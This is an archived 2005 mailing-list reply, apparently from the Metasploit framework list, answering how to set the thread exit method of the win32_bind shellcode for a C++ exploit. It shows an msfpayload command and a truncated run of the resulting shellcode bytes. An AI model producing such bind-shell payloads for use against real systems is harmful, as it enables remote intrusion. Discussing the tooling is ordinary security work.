Re: [framework] Help whit EXITFUNC

mmiller_at_hick.org
Date: 09/12/05

  • Next message: Lincoln Yeoh: ""tinyurl" url masking"
    Date: Mon, 12 Sep 2005 14:29:33 -0500
    To: Hugo Vinicius Garcia Razera <hviniciusg@gmail.com>
    
    

    On Mon, Sep 12, 2005 at 02:06:30PM -0400, Hugo Vinicius Garcia Razera wrote:
    > Hi every one, I would like to now if any one can help me whit this little
    > problem.
    >
    >
    >
    > I'm trying to use the win32_bind shell code that come whit the metasploit
    > Framework in one exploit that I'm writing in c++.
    >
    > The thing is that I need to modify the exit method for the exploit
    >
    >
    >
    > It says that the offset witch have to be modified is 308, so I want know
    > what is the code for "exitthread" that I have to put in this offset

    $ ./msfpayload win32_bind EXITFUNC=thread P
    "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
    "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
    ...


  • Next message: Lincoln Yeoh: ""tinyurl" url masking"

    Relevant Pages

    • File extension!!!!
      ... If I wanted to maintain the name of the file source, ... to modify the extension, what I must put?? ... Whit %SourceFileName%.xml, ...
      (microsoft.public.biztalk.general)
    • help with EXITFUNC
      ... I would like to now if any one can help me whit this little ... I'm trying to use the win32_bind shell code that come whit the metasploit ... It says that the offset witch have to be modified is 308, ... Hugo Vinicius Garcia Razera ...
      (Vuln-Dev)